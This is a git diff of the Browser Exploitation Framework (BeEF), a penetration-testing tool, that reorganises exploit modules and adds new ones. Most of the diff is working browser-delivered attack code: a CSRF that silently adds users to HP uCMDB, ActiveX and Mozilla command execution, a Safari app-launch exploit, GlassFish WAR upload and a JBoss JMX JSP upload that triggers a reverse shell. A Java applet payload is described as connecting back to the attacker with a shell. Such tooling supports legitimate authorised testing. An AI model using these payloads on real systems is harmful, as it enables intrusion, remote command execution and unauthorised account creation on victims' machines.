http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb index 21d58a474..7dee12c51 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb +++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Coldfusion_dir_traversal_exploit < BeEF::Core::Command diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js index a7d2744ad..1e0e2a8e3 100644 --- a/modules/exploits/glassfish_war_upload_xsrf/command.js +++ b/modules/exploits/glassfish_war_upload_xsrf/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com // For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html @@ -25,99 +16,6 @@ beef.execute(function() { var logUrl = restHost + '/management/domain/applications/application'; - //BEGIN Daniel Guerrero binary Base64-library -/* -Copyright (c) 2011, Daniel Guerrero -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - * Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - * Neither the name of the Daniel Guerrero nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -/** - * Uses the new array typed in javascript to binary base64 encode/decode - * at the moment just decodes a binary base64 encoded - * into either an ArrayBuffer (decodeArrayBuffer) - * or into an Uint8Array (decode) - * - * References: - * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer - * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array - */ - -var Base64Binary = { - _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", - - /* will return a Uint8Array type */ - decodeArrayBuffer: function(input) { - var bytes = Math.ceil( (3*input.length) / 4.0); - var ab = new ArrayBuffer(bytes); - this.decode(input, ab); - - return ab; - }, - - decode: function(input, arrayBuffer) { - //get last chars to see if are valid - var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); - var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); - - var bytes = Math.ceil( (3*input.length) / 4.0); - if (lkey1 == 64) bytes--; //padding chars, so skip - if (lkey2 == 64) bytes--; //padding chars, so skip - - var uarray; - var chr1, chr2, chr3; - var enc1, enc2, enc3, enc4; - var i = 0; - var j = 0; - - if (arrayBuffer) - uarray = new Uint8Array(arrayBuffer); - else - uarray = new Uint8Array(bytes); - - input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); - - for (i=0; i> 4); - chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); - chr3 = ((enc3 & 3) << 6) | enc4; - - uarray[i] = chr1; - if (enc3 != 64) uarray[i+1] = chr2; - if (enc4 != 64) uarray[i+2] = chr3; - } - - return uarray; - } -} - //END Daniel Guerrero binary Base64-library if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) { @@ -204,10 +102,8 @@ var Base64Binary = { var c = "--" + boundary + "\r\n" c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; c += "Content-Type: application/octet-stream\r\n\r\n"; - - for(var i = 0; i< value.length; i++){ - c+=String.fromCharCode(value[i] & 0xff); - } + + c += atob(value); c += "\r\n"; return c; @@ -215,7 +111,7 @@ var Base64Binary = { function start() { - fileUpload(Base64Binary.decode(warBase),warName); + fileUpload(warBase,warName); } start(); diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml index 38febe15b..53633a7ab 100644 --- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml +++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -23,4 +13,4 @@ beef: authors: ["Bart Leppens"] target: working: ["FF", "S", "C"] - not_working: ["IE"] + not_working: ["IE", "O"] diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb index a18ca8cd4..4b9586b13 100644 --- a/modules/exploits/glassfish_war_upload_xsrf/module.rb +++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Glassfish_war_upload_xsrf < BeEF::Core::Command diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js new file mode 100644 index 000000000..d30127f35 --- /dev/null +++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js @@ -0,0 +1,32 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +beef.execute(function() { +var protocol = '<%= @protocol %>'; +var host = '<%= @host %>'; +var port = '<%= @port %>'; +var usertype = '<%= @usertype %>'; +var customerid = '<%= @customerid %>'; +var username = '<%= @username %>'; +var password = '<%= @password %>'; + +var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype; +url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password; + +if (usertype == 'createIntegrationUser'){ + url += '&arg3='; +} + +var ucmdb_iframe = beef.dom.createInvisibleIframe(); +ucmdb_iframe.setAttribute('src', url); + +cleanup = function() { + document.body.removeChild(ucmdb_iframe); +} +setTimeout("cleanup()", 15000); + +beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed"); +}); diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml new file mode 100644 index 000000000..50fc32640 --- /dev/null +++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + hp_ucmdb_add_user_csrf: + enable: true + category: "Exploits" + name: "HP uCMDB 9.0x add user CSRF" + description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).
For more information please refer to http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html" + authors: ["Bart Leppens"] + target: + working: ["ALL"] diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb new file mode 100644 index 000000000..9781327d7 --- /dev/null +++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb @@ -0,0 +1,31 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +class Hp_ucmdb_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore', + 'store_fields' => ['protocol'], 'store_data' => [['http'],['https']], + 'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true + }, + {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, + {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'}, + { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore', + 'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']], + 'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true + }, + {'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'}, + {'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/java_payload/config.yaml b/modules/exploits/java_payload/config.yaml deleted file mode 100755 index 0d58413ba..000000000 --- a/modules/exploits/java_payload/config.yaml +++ /dev/null @@ -1,26 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - java_payload: - enable: true - category: "Exploits" - name: "Java Payload" - description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported." - authors: ["antisnatchor"] - target: - not_working: ["FF"] - user_notify: ["All"] diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js index 1d64217ff..2fb1c10d2 100644 --- a/modules/exploits/jboss_jmx_upload_exploit/command.js +++ b/modules/exploits/jboss_jmx_upload_exploit/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * Jboss 6.0.0M1 JMX Upload Exploit * Ported from l33tb0y Ruby code in Javascript by antisnatchor. @@ -43,11 +34,11 @@ beef.execute(function() { uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True"; /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/ - beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){ - if(response.status_code == "success"){ + beef.net.forge_request("http", "HEAD", rhost, rport, uri, null, null, null, 10, 'script', true, null,function(response){ + if(response.status_code == 200){ function triggerReverseConn(){ - beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){ - if(response.status_code == "success"){ + beef.net.forge_request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, null, 10, 'script', true, null,function(response){ + if(response.status_code == 200){ if(payloadType == "reverse"){ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); }else{ @@ -64,4 +55,4 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed."); } }); -}); \ No newline at end of file +}); diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml index 880a582a3..457c4efba 100644 --- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml +++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -23,3 +13,4 @@ beef: authors: ["antisnatchor", "l33tb0y"] target: working: ["ALL"] + not_working: "O" diff --git a/modules/exploits/jboss_jmx_upload_exploit/module.rb b/modules/exploits/jboss_jmx_upload_exploit/module.rb index a5345cdb6..e18541ab3 100644 --- a/modules/exploits/jboss_jmx_upload_exploit/module.rb +++ b/modules/exploits/jboss_jmx_upload_exploit/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Jboss_jmx_upload_exploit < BeEF::Core::Command diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js new file mode 100755 index 000000000..4d3e7cd71 --- /dev/null +++ b/modules/exploits/local_host/activex_command_execution/command.js @@ -0,0 +1,25 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var cmd = '<%= @cmd.gsub(/'/, "\\'") %>'; + var result = "command was not sent"; + + try { + var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd); + if (shell.toString() == 0) { + result = "command sent"; + } else { + result = "command failed"; + } + } catch(e) { + result = "command failed"; + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); + +}); diff --git a/modules/exploits/local_host/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml new file mode 100755 index 000000000..96022b207 --- /dev/null +++ b/modules/exploits/local_host/activex_command_execution/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + activex_command_execution: + enable: true + category: ["Exploits", "Local Host"] + name: "ActiveX Command Execution" + description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.

The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled." + authors: ["bcoles"] + target: + user_notify: ["IE"] + not_working: ["ALL"] diff --git a/modules/exploits/local_host/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb new file mode 100755 index 000000000..20e0915dc --- /dev/null +++ b/modules/exploits/local_host/activex_command_execution/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Activex_command_execution < BeEF::Core::Command + + def self.options + return [ + {'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar similarity index 100% rename from modules/exploits/java_payload/AppletReverseTCP-0.2.jar rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar similarity index 100% rename from modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js similarity index 73% rename from modules/exploits/java_payload/command.js rename to modules/exploits/local_host/java_payload/command.js index 8ebcfcc28..f8938107f 100755 --- a/modules/exploits/java_payload/command.js +++ b/modules/exploits/local_host/java_payload/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var conn = '<%= @conn %>'; diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml new file mode 100755 index 000000000..47bb3370d --- /dev/null +++ b/modules/exploits/local_host/java_payload/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + java_payload: + enable: true + category: ["Exploits", "Local Host"] + name: "Java Payload" + description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported." + authors: ["antisnatchor"] + target: + not_working: ["FF"] + user_notify: ["All"] diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb similarity index 54% rename from modules/exploits/java_payload/module.rb rename to modules/exploits/local_host/java_payload/module.rb index 2f3380bc7..5f83c6f18 100755 --- a/modules/exploits/java_payload/module.rb +++ b/modules/exploits/local_host/java_payload/module.rb @@ -1,22 +1,12 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Java_payload < BeEF::Core::Command def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') end def self.options diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js similarity index 58% rename from modules/exploits/mozilla_nsiprocess_interface/command.js rename to modules/exploits/local_host/mozilla_nsiprocess_interface/command.js index 758a5dea5..bbf2f434b 100644 --- a/modules/exploits/mozilla_nsiprocess_interface/command.js +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "command sent"; diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml similarity index 59% rename from modules/exploits/mozilla_nsiprocess_interface/config.yaml rename to modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml index 7e1b71cd2..97be87d19 100644 --- a/modules/exploits/mozilla_nsiprocess_interface/config.yaml +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml @@ -1,23 +1,13 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: mozilla_nsiprocess_interface: enable: false - category: "Exploits" + category: ["Exploits", "Local Host"] name: "Mozilla nsIProcess XPCOM Interface (Windows)" description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe

Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine." authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"] diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb new file mode 100644 index 000000000..74f7874bd --- /dev/null +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb @@ -0,0 +1,22 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# This module is a port of the same module from BeEF-0.4.0.0 +# It has not been tested +class Mozilla_nsiprocess_interface < BeEF::Core::Command + + def self.options + return [ + {'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'} + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/exploits/local_host/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js new file mode 100755 index 000000000..10b0fefb4 --- /dev/null +++ b/modules/exploits/local_host/safari_launch_app/command.js @@ -0,0 +1,14 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var baseTag = document.createElement('base'); + baseTag.setAttribute('id', 'sla_<%= @command_id %>'); + baseTag.setAttribute('href', 'file://'); + document.head.appendChild(baseTag); + setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000); + setTimeout('document.head.removeChild(document.getElementById("sla_<%= @command_id %>"));beef.net.send("<%= @command_url %>", <%= @command_id %>, "Base tag removed");', 1000); +}); diff --git a/modules/exploits/local_host/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml new file mode 100755 index 000000000..9d68e8df5 --- /dev/null +++ b/modules/exploits/local_host/safari_launch_app/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + safari_launch_app: + enable: true + category: ["Exploits", "Local Host"] + name: "Safari Launch App" + description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel." + authors: ["antisnatchor"] + target: + user_notify: ["S"] + not_working: ["All"] diff --git a/modules/exploits/local_host/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb new file mode 100755 index 000000000..2e3928be0 --- /dev/null +++ b/modules/exploits/local_host/safari_launch_app/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Safari_launch_app < BeEF::Core::Command + + def self.options + return [ + {'name'=>'app_path', 'ui_label' => 'Application', 'value' => '/usr/sbin/netstat'}, + ] + end + +end diff --git a/modules/exploits/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js similarity index 58% rename from modules/exploits/window_mail_client_dos/command.js rename to modules/exploits/local_host/window_mail_client_dos/command.js index 38eebf375..cebf54b9c 100644 --- a/modules/exploits/window_mail_client_dos/command.js +++ b/modules/exploits/local_host/window_mail_client_dos/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// 